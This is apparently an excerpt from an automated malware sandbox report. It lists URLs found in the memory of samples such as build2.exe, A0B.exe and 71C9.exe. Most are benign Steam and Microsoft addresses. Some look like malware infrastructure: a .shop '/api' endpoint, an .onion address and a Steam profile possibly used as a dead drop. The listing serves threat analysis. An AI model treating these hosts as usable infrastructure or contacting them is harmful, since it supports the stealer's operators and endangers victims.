            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=yp9unEzrjc_Z&amp
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
            Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
            Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
            Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
            Source: explorer.exe, 00000022.00000003.3205641737.0000000007D09000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3201833144.0000000007D0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13SKoy.img
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
            Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.comt
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: explorer.exe, 00000022.00000003.3204949143.00000000094D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.00000000094DF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.00000000094DF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3237926713.00000000094D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: explorer.exe, 00000002.00000000.2112529074.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3124819163.0000000001492000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/
            Source: A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/.
            Source: A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/8
            Source: A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/?_
            Source: A0B.exe, 00000017.00000003.3011875021.0000000001479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/T
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3047552796.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3050934664.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3055723074.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3037616829.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046520097.000000000150B000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3053757270.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3035470425.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3052487472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3048685406.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049074916.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049820825.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api5
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apiMs
            Source: A0B.exe, 00000017.00000003.3047552796.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3050934664.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3055723074.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046520097.000000000150B000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3053757270.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3052487472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3048685406.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049074916.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049820825.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apia
            Source: A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apib
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.org
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orgServersCaptionMicrosoft
            Source: 71C9.exe, 0000001D.00000002.3222435019.000000000C538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46E000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemSc
            Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttps://statsexplorer.org
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/#
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
